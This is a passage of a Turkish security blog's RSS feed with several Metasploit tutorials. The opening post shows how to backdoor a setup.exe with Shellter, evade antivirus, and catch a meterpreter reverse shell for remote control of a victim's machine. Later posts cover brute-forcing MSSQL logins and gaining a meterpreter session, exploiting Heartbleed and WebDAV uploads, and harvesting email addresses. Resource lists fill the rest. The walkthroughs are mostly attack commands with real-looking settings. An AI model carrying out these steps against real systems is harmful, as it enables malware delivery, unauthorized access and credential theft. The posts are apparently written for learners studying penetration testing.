Bize hangi payloadı kullanmak istediğimizi soruyor burada 1. seçeneği seçiyorum. Seçerken önce Local payload kullanacağımızı belirtmek için L yazıyoruz ardından 1 yazarak devam ediyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Daha sonra bizden LHOST ve LPORT girmemizi istiyor buralara kendi ip adresimiz ve kullanmak istediğimiz portu yazıyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Daha sonra shellter geri kalan işlemleri bizim için hallediyor. Son olarak entera basmamızı istiyor ve zararlı uygulamamız hazır.

Ekran görüntüsü_2016-08-15_15-04-54

setup.exe artık içerisinde zararlı kodlarda barındıran bir uygulama. Karışıklık olmaması için ismini zararli4.exe olarak değiştiriyorum ve ardından hemen virustotalde tarama işlemini başlatıyorum.

Ekran görüntüsü_2016-08-15_15-04-54

Sonucun oldukça tatmin edici olduğunu düşünüyorum. Popüler antivirüslerin hepsinden kaçmayı başardık. İlk haline göre sadece bir tane antivirüs programına yakalandık.
Oldukça başarılı sonuçlanan son uygulamadan sonra bu exe yi nasıl kullanacağımıza sıra geldi. Burada Metasploit Framework’ü kullanacağız. Terminalden msfconsole komutu ile Metasploit Framework’ü çalıştırabiliriz.

Ekran görüntüsü_2016-08-15_15-04-54

use exploit/multi/handler

komutu ile exploitimizi kullanmak için çağırıyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Daha sonra set PAYLOAD windows/meterpreter/reverse_tcp komutunu yazarak meterpreter payloadını exploite dahil ediyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

show options komutuyla exploite vermemiz gereken bilgileri görüyoruz. Burada ip adresimizi ve exeyi oluştururken verdiğimiz port adresimizi yazacağız.
set LHOST 192.168.56.101
set LPORT 443
Daha sonra exploit diyerek programdan gelecek istekleri dinlemeye başlayacağız.

Ekran görüntüsü_2016-08-15_15-04-54

Dinlemeye başarılı bir şekilde başladık. Artık hedef kişinin programı çalıştırmasını bekliyoruz. Çalıştırdığı anda buraya bilgileri gelecek ve o bilgisayarda erişim sahibi olacağız.

Ekran görüntüsü_2016-08-15_15-04-54

Windows bilgisayardan (hedef), bizim oluşturduğumuz exe çalıştığı anda meterpreter oturumuna sahip oluyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Yazının başında paylaştığım görsellerdeki meterpreter komutlarını artık hedef sistem zerinde çalıştırabiliriz. Hatta hedefin kullandığı işletim sisteminin hak yükseltme exploitini kullanarak tüm yetkilere sahip olan bir kullanıcı kaydedebilir, istediğimiz zaman o sisteme bağlanabiliriz.

Ekran görüntüsü_2016-08-15_15-04-54

Sonuna kadar okuduğunuz için teşekkür ederiz. Paü siber ..

TR | Backdoor Hazırlanması ve Antivirüs Bypass Edilmesi CypmUni PAÜ

]]>
https://canyoupwn.me/tr-backdoor/feed/ 7
TR | How to Harvest Emails via Metasploit https://canyoupwn.me/tr-email-harvesting/ https://canyoupwn.me/tr-email-harvesting/#respond Sun, 10 Apr 2016 00:03:38 +0000 https://canyoupwn.me/?p=1606 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bir domaine ait arama motorlarınca indexlenen mail adreslerini bulmak için metasploit framework`ün Search Email Collector modülünün kullanımını inceleyeceğiz. Linux işletim sisteminizde metasploit kurlu olduğunu varsayarak işlemere geçiyoruz yoksa linkten indirip kurulumu yapabilirsiniz. Metasploit Framework` ü çalıştırmak için terminale; msfconsole komutunu yazarak metasploit framework` ü çalıştırıyoruz.   Search Email Collector modülünü çalıştırmak için; use auxiliary/gather/search_email_collector komutunu yazıp çalıştırıyoruz. […]

TR | How to Harvest Emails via Metasploit Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bir domaine ait arama motorlarınca indexlenen mail adreslerini bulmak için metasploit framework`ün Search Email Collector modülünün kullanımını inceleyeceğiz.

Linux işletim sisteminizde metasploit kurlu olduğunu varsayarak işlemere geçiyoruz yoksa linkten indirip kurulumu yapabilirsiniz.

  • Metasploit Framework` ü çalıştırmak için terminale;
msfconsole

komutunu yazarak metasploit framework` ü çalıştırıyoruz.

Screenshot_20160410_024235

 

  • Search Email Collector modülünü çalıştırmak için;
use auxiliary/gather/search_email_collector

komutunu yazıp çalıştırıyoruz.

Screenshot_20160410_024755

 

  • Modülün parametrelerini görüntülemek için;
show options

komutunu giriyoruz.

Screenshot_20160410_025011

  1. DOMAIN: mail adresini istediğimiz domain girmek için kullandığımız parametre.
  2. OUTFILE: mail listesini çıktı almak yani bir yere kaydetmek için kullanılır.
  3. SEARCH_BING: bing arama motorunda arama yapmak için.
  4. SEARCH_GOOGLE: google arama motorunda arama yapmak için.
  5. SEARCH_YAHOO: yahoo arama motorunda  arama yapmak için.

 

  • Örnek üzerinden kullanıma devam edersek, tüm arama motorlarında example.com domainine ait mailleri bulmak için.
set DOMAIN example.com

komutunu yazıp çalıştırıyoruz.

Screenshot_20160410_025749

  • Modülü arama yapması için çalıştırmak için;
run

komutu ile aramayı başlatıyoruz.

Screenshot_20160410_025954

TR | How to Harvest Emails via Metasploit Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-email-harvesting/feed/ 0
EN | Awesome Learn Network Security https://canyoupwn.me/en-awesome-learn-network-security/ https://canyoupwn.me/en-awesome-learn-network-security/#respond Fri, 01 Apr 2016 12:00:18 +0000 https://canyoupwn.me/?p=1381 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Network Scanning / Pentesting OpenVAS Metasploit Framework pig Pompem Monitoring / Logging justniffer httpry ngrep passivedns sagan OSSEC ntopng nmap IDS / IPS / Host IDS / Host IPS Snort Bro Suricata Security Onion sshwatch Honey Pot / Honey Net Dionaea Conpot Amun Glastopf Kippo Kojoney HonSSH Bifrozt HoneyDrive Cuckoo Sandbox Full Packet Capture / Forensic […]

EN | Awesome Learn Network Security Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Network

Scanning / Pentesting

Monitoring / Logging

IDS / IPS / Host IDS / Host IPS

Honey Pot / Honey Net

Full Packet Capture / Forensic

Sniffer

Security Information & Event Management

VPN

Fast Packet Processing

EN | Awesome Learn Network Security Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/en-awesome-learn-network-security/feed/ 0
TR | Awesome Learn Web Security https://canyoupwn.me/awesome-learn-web-app-sec/ https://canyoupwn.me/awesome-learn-web-app-sec/#respond Tue, 22 Mar 2016 07:10:48 +0000 https://canyoupwn.me/?p=1104 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Exploit Kaynakları : Exploit – DB – The most known vulnerability DB 0day.today – Inj3ct0r Team’s Vulnerability DB Packet Storm Security – Global Security Vulnerability DB Vuln WP Database – WPScan’s Vulnerability DB   Kitaplar : The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws Hacking Exposed Web Applications Hacking Web Apps: Detecting and […]

TR | Awesome Learn Web Security CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

  • Exploit Kaynakları :

Exploit – DB – The most known vulnerability DB

0day.today – Inj3ct0r Team’s Vulnerability DB

Packet Storm Security – Global Security Vulnerability DB

Vuln WP Database – WPScan’s Vulnerability DB

 

  • Kitaplar :

The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws

Hacking Exposed Web Applications

Hacking Web Apps: Detecting and Preventing Web Application Security Problems

The Tangled WEB: A Guide to Securing Modern Web Applications

SQL Injection Attacks and Defense

Web Application Obfuscation: ‘-/WAFs..Evasion..Filters//alert(/Obfuscation/)-‘

XSS Attacks: Cross Site Scripting Exploits and Defense

The Browser Hacker’s Handbook

The Basics of Web Hacking: Tools and Techniques to Attack the Web

Web Penetration Testing with Kali Linux

Web Application Security, A Beginner’s Guide

 

  • Araçlar :

 

Netsparker

Xenotix XSS Exploit Framework

TrustKeeper

SOAtest

Vega

Grabber

wFuzz

Wapiti

DirBuster

Nikto

Wikto ( Nikto’s Windows Version)

SkipFish

WebScarab

w3af

BeeF Framework

SQLMap

OWASP Zap

Burp Suite

Metasploit

 

  • Online Kurslar :

Offensive Computer Security

Offensive Network Security

Security Tube

Security Trainings

Woz-U

 

  • Cheat Sheets :

SQL Injection Cheat Sheets:

SQL Injection Cheat Sheet

 

XSS Cheat Sheets:

Filter Evasion by OWASP

Our Favorite XSS Filters and How to Attack Them

OWASP XSS Cheat Sheet

Lots of XSS Payloads

XSS Cheat Sheet from Adobe

 

 

TR | Awesome Learn Web Security CanYouPwnMe

]]>
https://canyoupwn.me/awesome-learn-web-app-sec/feed/ 0
TR | Awesome Learn Pentesting https://canyoupwn.me/tr-awesome-penetration-testing/ https://canyoupwn.me/tr-awesome-penetration-testing/#respond Wed, 09 Mar 2016 07:00:59 +0000 https://canyoupwn.me/?p=709 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Online Kaynaklar: Sızma Testi Kaynakları Metasploit Unleashed – Ücretsiz Metasploit Kursları PTES – Sızma Testi Standartları OWASP – Web Uygulama Güvenliği Projesi   Shellcode Geliştirme Shellcode Örnekleri – Shellcode Veritabanı   Sosyal Mühendislik Kaynakları Kilit Kırma Kaynakları Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri   Araçlar Sızma Testi Dağıtımları Kali BlackArch […]

TR | Awesome Learn Pentesting Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Online Kaynaklar:

Sızma Testi Kaynakları

 

Shellcode Geliştirme

 

Sosyal Mühendislik Kaynakları

Kilit Kırma Kaynakları

Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri

Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri

 

Araçlar

Sızma Testi Dağıtımları

 

Basit Sızma Testi Araçları

 

Zafiyet Tarama Araçları

  • Netsparker – Web Uygulama Güvenliği Tarama Aracı
  • Nexpose – Zafiyet/Risk Yönetimi Aracı
  • Nessus – Zafiyet Yapılandırma, Denetleme Aracı
  • OpenVAS -Açık Kaynaklı Zafiyet Tarama Aracı
  • OWASP Zed Attack Proxy – Web Uygulama Zafiyet Tarama Aracı
  • Secapps – Entegre Web Uygulama Güvenliği Test Ortamı
  • w3af – Web Uygulama Saldırı Aracı
  • Wapiti – Web Uygulama Zafiyet Tarama Aracı
  • Webreaver – Web Uygulama Zafiyet Tarama Aracı

 

Ağ Araçları

  • nmap – Ağ Haritası Çıkarmak, Çalışan Hizmetleri…vb. Bilgileri Elde Etmemize Yardımcı Olur
  • tcpdump – Paket Analizi Yapmamıza Yardımcı Olur
  • Wireshark – Ağ Protokol Analiz Aracı
  • Network Tools – Yaygın Olarak Kullanılan Ağ Araçları
  • netsniff-ng – Ağ Dinleme Aracı
  • SPARTA – Ağ Protokol Analiz Aracı

 

Kablosuz Ağ Araçları

  • Aircrack-ng – Kablosuz Ağ Trafiği Dinleme Aracı
  • KISMET – Kablosuz Ağ Dinleme Aracı
  • Reaver – Kaba Kuvvet Saldırı Aracı

 

SSL Analiz Araçları

  • SSLyze – SSL YapılandırmasI Tarama Aracı
  • sslstrip – https Saldırı Aracı

 

HEX Düzenleme

  • Hexed – Tarayıcı Tabanlı Hex Analiz Aracı

 

Kırma Araçları

 

Windows Araçları

 

DDoS Araçları

 

Sosyal Mühendislik Araçları

  • SET – Sosyal Mühendislik Araç Kiti

 

OSInt Araçları

  • Maltego – Aktif ve Pasif Bilgi Toplama Aracı

 

Gizlilik Araçları

  • Tor – Onion Yönlendirme İle Ağda Kimliğinizi Gizlemeye Yarar
  • I2P – The Invisible Internet Project

 

Tersine Mühendislik Araçları

 

Kitaplar

Sızma Testi Kitapları

 

Hacker ın El Kitabı Serisi

 

Ağ Analiz Kitapları

 

Tersine Mühendislik Kitapları

Zararlı Analiz Kitapları

Windows Kitapları

Sosyal Mühendislik Kitapları

Kilit Kırma Kitapları

 

Zafiyet Veritabanları

 

Güvenlik Kursları

 

Ctf Kütüphaneleri

 

Bilgi Güvenliği Konferansları

 

En Yaygın 125 Ağ Güvenliği Aracı

 

 

TR | Awesome Learn Pentesting Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-awesome-penetration-testing/feed/ 0
TR | How to exploit Heartbleed with Metasploit https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/ https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/#respond Mon, 07 Mar 2016 07:02:44 +0000 https://canyoupwn.me/?p=996 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhaba arkadaşlar aslında bugünlerde bu zafiyete sıklıkla rastlanmaz ancak her eski zafiyet gibi bir çok sistemde de bulunması muhtemel. Heartbleed Zafiyeti Nedir ? HTTPS den bahsedersek.Kısaca sizin gönderdiğiniz verilerin çok güçlü bir şifreleme metoduyla şifrelenmesi anlamına gelir. Bu da bağlantılarda sunucu ile aranıza giricek kişilerin sizden herhangi bir veri yakalayamayacağı anlamına gelir. Bankalar, Facebook, Twitter, […]

TR | How to exploit Heartbleed with Metasploit Enes ERGÜN

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhaba arkadaşlar aslında bugünlerde bu zafiyete sıklıkla rastlanmaz ancak her eski zafiyet gibi bir çok sistemde de bulunması muhtemel.

Heartbleed Zafiyeti Nedir ?

HTTPS den bahsedersek.Kısaca sizin gönderdiğiniz verilerin çok güçlü bir şifreleme metoduyla şifrelenmesi anlamına gelir. Bu da bağlantılarda sunucu ile aranıza giricek kişilerin sizden herhangi bir veri yakalayamayacağı anlamına gelir. Bankalar, Facebook, Twitter, Bir çok büyük kuruluş hatta farkettiyseniz canyoupwn.me adresinde de kullanılıyor.

Bakın yukarıda verdiğim örnekler arasında bankalar, alışveriş siteleri var ve bu katmanda çıkacak herhangi bir açığın ne denli önemli olabileceğini düşünebiliyor musunuz ? Heartbleed açığı da o yüzden bu kadar ses getirmişti. Hatta o dönem The Fappening olayıyla çoğu ünlünün fotoğrafları internete düştüğünde bunun gerisinde kalmıştı en azından güvenlik sektöründe…

Not:Öncelikle bu açık sayesinde hafızadan rastgele bilgiler çekilir, her zaman başarıya ulaşamayabilirsiniz.
Şimdi lafı uzatmadan yapılacak işlemleri görelim.
İlk önce hedef sisteme bir port taraması yapılması gerekiyor ancak NSE scripti ile birlikte yapılırsa daha sağlıklı sonuç alınacaktır.

nmap -sV --script=ssl-heartbleed hedefIP 

Bu scripti ilk kez kullanıyorsanız sizde de büyük ihtimal aşağıda ki gibi bir hata vericektir.
Seçim_013

Bu hatayı çözmek için öncelikle aşağıda ki adrese girip nmap scriptini indirelim.

https://nmap.org/nsedoc/scripts/ssl-heartbleed.html 

Seçim_014

Daha sonra bu scripti yukarıda gördüğünüz gibi:

 /usr/share/nmap/scripts 

içine atın.

Bunu ister terminal ile istersenizde file browser ile atabilirsiniz.
Şimdi hadi scripti kullanarak taratalım.
Seçim_016

Gördüğünüz gibi 3443 portunda çalışan ssl/http portunda ssl-heartbeed zafiyeti var. 3443 portunu aklınızda tutun lazım olucak 🙂

Şimdi bizim için işleri otomatikleştiren ve kolaylaştıran Metasploit Framework’u açıyoruz . Terminale msfconsole yazabilirsiniz.

Seçim_017

Metasploit’e giriş yaptıkdan sonra “search heartbleed” yazıp kullanabiliceğimiz araçları görebilirsiniz.
Seçim_018

use auxiliary/scanner/ssl/openssl_heartbleed 

aracımıza girdikten sonra show options yazıyoruz ve aşağıda ki komutları giriyoruz.

set rhosts hedefIP 
set verbose true 
set rport 3443 

Ardından “run” komutunu çalıştırarak auxiliary aracını tetikliyoruz.

Seçim_019

Server tarafından hafızadan çekilen (leak) edilen veriyi görüyorsunuz.
Tekrar hatırlatmak isterim :
Not:Öncelikle bu açık sayesinde hafızadan rastgele bilgiler çekilir her zaman başarıya ulaşamayabilirsiniz.

TR | How to exploit Heartbleed with Metasploit Enes ERGÜN

]]>
https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/feed/ 0
TR | How to exploit MSSQL with Metasploit https://canyoupwn.me/tr-how-to-exploit-mssql-with-metasploit/ https://canyoupwn.me/tr-how-to-exploit-mssql-with-metasploit/#respond Sun, 28 Feb 2016 07:00:32 +0000 https://canyoupwn.me/?p=797 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Açıklamalar: Test sunucusu olarak MSSQL 2005 kullanılmıştır.Burada ki bilgiler tamamen teoriktir.Uygulama kısımları ise pekiştirme amacıyla kullanılmıştır.Farklı senaryolarla karşılaşabilme ihtimaliniz yüksektir burada iş tamamen size düşüyor. Hadi başlayalım. İlk yapmamız gereken iş tabi ki sistem de bi tarama yapmamız gerek ve biz ne yapıyoruz ? Nmap dediğinizi duyar gibiyim hayır nmap ile taramıyoruz hemen metasploit’e giriyoruz.Metasploit’e […]

TR | How to exploit MSSQL with Metasploit Enes ERGÜN

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Açıklamalar: Test sunucusu olarak MSSQL 2005 kullanılmıştır.Burada ki bilgiler tamamen teoriktir.Uygulama kısımları ise pekiştirme amacıyla kullanılmıştır.Farklı senaryolarla karşılaşabilme ihtimaliniz yüksektir burada iş tamamen size düşüyor.

Hadi başlayalım.

İlk yapmamız gereken iş tabi ki sistem de bi tarama yapmamız gerek ve biz ne yapıyoruz ? Nmap dediğinizi duyar gibiyim hayır nmap ile taramıyoruz hemen metasploit’e giriyoruz.Metasploit’e terminal üzerinden girmek için hemen

 msfconsole 

yazıyoruz.Daha sonra mssql serverın bilgilerini vericek scanner’ı açmamız gerekiyor.Durmuyoruz hemen yazıyoruz

 use auxiliary/scanner/mssql/mssql_ping 

Metasploit de ilk yapmamız gerekenler nelerdi ? Hemen Show options yazıyoruz.
mssqllogin

 

Burada metasploit için kesin gerekli olan satırları required altında görebiliyoruz.
Biz burada

set rhosts 192.168.1.3 

yazarak RHOSTS›u ayarlıyoruz.Daha sonra eğer tüm ağı tarıyacaksanız

set threads 10 

yazıyoruz.
Tüm ağdan örnek : 192.168.1.0/24
Ve run yazıp sonuçlarımıza bakıyoruz.

mssqlping

 

Bakın sonuçlar hemen önümüze çıktı.Ama burada bize herhangi bir port vermiyor ? Neden çünkü ben MSSQL’i network share olarak açmadım. Birde aşağıda ki resime bakalım.
mssqllogin2
Bakın burada TCP kısmında 1433 yazıyoruz.Bu bizim saldıracağımız kurban mssql server ‘ ının çalıştığı portudur.(Default Port)

Bu kısımdan sonra yapmamız gereken şey MSSQL server da yetkili bir abi olmak veya yetkili bir abinin kullanıcı adı ve şifresini bulmak.

Burada yine imdadımıza metasploit yetişiyor.

Hemen terminal ekranına

use auxiliary/scanner/mssql/mssql_login 

Not:Burada bruteforce(Kaba kuvvet) kullanıcaz.Yani bu olayın başarısı tamamen sizin elinizde ki wordlist in başarısı kadardır.

Wordlist oluşturmak için : Crunchbang kullanabilirsiniz.Sitede konusunu bulabilirsiniz.

mssql_login ayarlarını görmek için ise yine Show Options diyoruz.

mssqllogin4

 

Burada bruteforce speed wordlist inizin ne kadar hızlı bir şekilde deneniceğini belirtir.Biz 5 ayarlıyoruz.Sırasıyla şu ayarlamalarımızı yapıyoruz.

set pass_file passkeyword.txt
set user_file usernamekeyword.txt
set rhosts 192.168.1.3
set rport 1433

Ve run diyoruz.

Sonuç :

success

 

Yeşil renkte ki satır bize username ile password ü bulunmuş olduğunu gösteriyor.

Zaten bundan sonrası çorap söküğü gibi gelicektir.Hemen bakalım.
Yine metasploit consol ‘ a

use exploit/windows/mssql/mssql_payload

yazıyoruz ve ne yapıyorduk ?! Tabi ki show OPTIONS

mspayload
Burada az önce brute force ile bulmuş olduğumuz değerleri yazıcaz.Hemen alt alta yazılan komutları verelim.

set PASSWORD 369874125
set USERNAME sa
set RHOST 192.168.1.3
set RPORT 1433

Peki sadece bunlar yeterli mi ? Tabi ki de hayır.Meterpreter oturumuna erişebilmek için payload load etmemiz gerekicek.O yüzden

set payload windows/meterpreter/reverse_tcp

yazıyoruz ve exploit diyoruz.
payloadsuccess

Buradan sonra meterpreter session ‘ ı açılıyor.

Meterpreter hakkında bilgi için : Yine sitemizde konusu bulunuyor buradan yardım alabilirsiniz.

meterpreter

Karşıda ki sunucunun C: sürücüsündeyiz.Peki örnek olması açısından ne yapabiliriz ? Hiçbir şey! Şaka tabi ki artık sistem elinizde neden birşey yapamayasınız ki.

Ben örnek olarak C: sürücüsünde enes diye klasör oluşturup içine enes diye bir txt dosyası attım.( Yok öyle trojan , worm atmak )
uploadfile
mkfile
Not:Meterpreter.txt dosyasını atmıştım fakat ismini değiştirdim.
Neden worm trojan atamayız ? Veya bir exe ? Mode kısmında görebilirsiniz. ( Executable terimi hatırlatıcı olsun.)
Şimdi sisteme ulaştık fakat görüceksiniz ki çoğu yetkiniz yok ? Ne yapmamız gerekiyor ? Eğer domain yapısı kullanılıyor ise Meterpreter den cmd (Command Prompt ) ye ulaşabilir ve admin group olarak bir kullanıcı ekleyebilirsiniz.

Bu kısımdan sonrası tamamen size kalmıştır örnek olması açısından sadece resimler eklenicektir.
Ama biz ne yapıyoruz ? Özel yetkiler almaya çalışıyoruz.(Alamadı)
Not:Çeşitli yetkiler alabilmek için meterpreter oturumunu arkaplana atabilirsiniz.
getpriv1

Bypassuac denedim fakat başarılı olamadım o yüzden ms10_015_kitrap0d exploitini denemeye karar verdim.

getprivsuccess

Exploitimiz başarılı oldu ama session oluşturamadık.Yani başaramadım ama eminim siz başaracaksınız.

 

TR | How to exploit MSSQL with Metasploit Enes ERGÜN

]]>
https://canyoupwn.me/tr-how-to-exploit-mssql-with-metasploit/feed/ 0
TR | Metasploit Framework Yardımı ile WebDAV Servisi Zafiyetinden Yararlanma https://canyoupwn.me/tr-metasploit-framework-yardimi-ile-webdav-servisi-zafiyetinden-yararlanma/ https://canyoupwn.me/tr-metasploit-framework-yardimi-ile-webdav-servisi-zafiyetinden-yararlanma/#respond Thu, 18 Feb 2016 07:30:18 +0000 https://canyoupwn.me/?p=691 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

WebDAV Nedir ? WebDav (Web Distributed Authoring and Versioning) ; Web sunucularında saklanan dosyaları düzenlemek ve yönetmek amacıyla, kullanıcılar arasındaki işbirliğini kolaylaştıran bir HTTP (Hypertext Transfer Protocol) uzantısıdır. HTTP 1.1 protokolü ile çalışır. Kullanıcılara, sunucu üstünde döküman oluşturma, düzenleme ve taşıma gibi işlemleri gerçekleştirebileceği bir arayüz sağlar. WEBDAV Servislerine Yönelik Keşif Nmap’in bize sunduğu keşif […]

TR | Metasploit Framework Yardımı ile WebDAV Servisi Zafiyetinden Yararlanma CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

WebDAV Nedir ?

WebDav (Web Distributed Authoring and Versioning) ; Web sunucularında saklanan dosyaları düzenlemek ve yönetmek amacıyla, kullanıcılar arasındaki işbirliğini kolaylaştıran bir HTTP (Hypertext Transfer Protocol) uzantısıdır. HTTP 1.1 protokolü ile çalışır. Kullanıcılara, sunucu üstünde döküman oluşturma, düzenleme ve taşıma gibi işlemleri gerçekleştirebileceği bir arayüz sağlar.

WEBDAV Servislerine Yönelik Keşif
Nmap’in bize sunduğu keşif scriptten ve Metasploit’in keşif aracından bahsedeceğim.

Nmap ile WebDAV Servisinin Keşfi

nmap --script http-iis-webdav-vuln.nse <hedef ip> -p 80

bu şekilde bir arama yapılarak keşif yapılabilir.

Metasploit ile WebDAV Servisinin Keşfi

  • Metasploit Framework çalıştırılır .
msfconsole
  • WebDAV keşif aracı yüklenir.
use auxiliary/scanner/http/webdav_scanner
  • Seçenekleri görüntüleriz.
show options
  • Hedef host girilir.
set RHOSTS <hedef_adres>
  • Uygulama Çalıştırılır.
run

Şimdi zafiyetli host’u nasıl sömüreceğiz kısmına geçelim.

Picture2

Exploit

  • Metasploit Framework çalıştırılır .
msfconsole

Exploit arıyoruz.

search webdav
  • Exploit yüklüyoruz.
use exploit/windows/iis/iis_webdav_upload_asp
  • Reverse tcp payloadımızı ekliyoruz shell alabilmek için
set PAYLOAD windows/meterpreter/reverse_tcp

Picture1

  • Reverse shellin hangi ip üzerinden yapacağını belirtiyoruz.
set LHOST <adresin>

Saldırıda bulucağınız server’in adresi girilir.

set RHOST <hedef_adres>
  • Exploit çalıştırılır.

Picture3

exploit
  • Reverse shell port değiştirilmediyse 4444 portundan bağlantı gerçekleştirebiliriz.
  • Sistemdeki yetkinizi kontrol etmek için bu komut kullanılır
whoami

 

TR | Metasploit Framework Yardımı ile WebDAV Servisi Zafiyetinden Yararlanma CanYouPwnMe

]]>
https://canyoupwn.me/tr-metasploit-framework-yardimi-ile-webdav-servisi-zafiyetinden-yararlanma/feed/ 0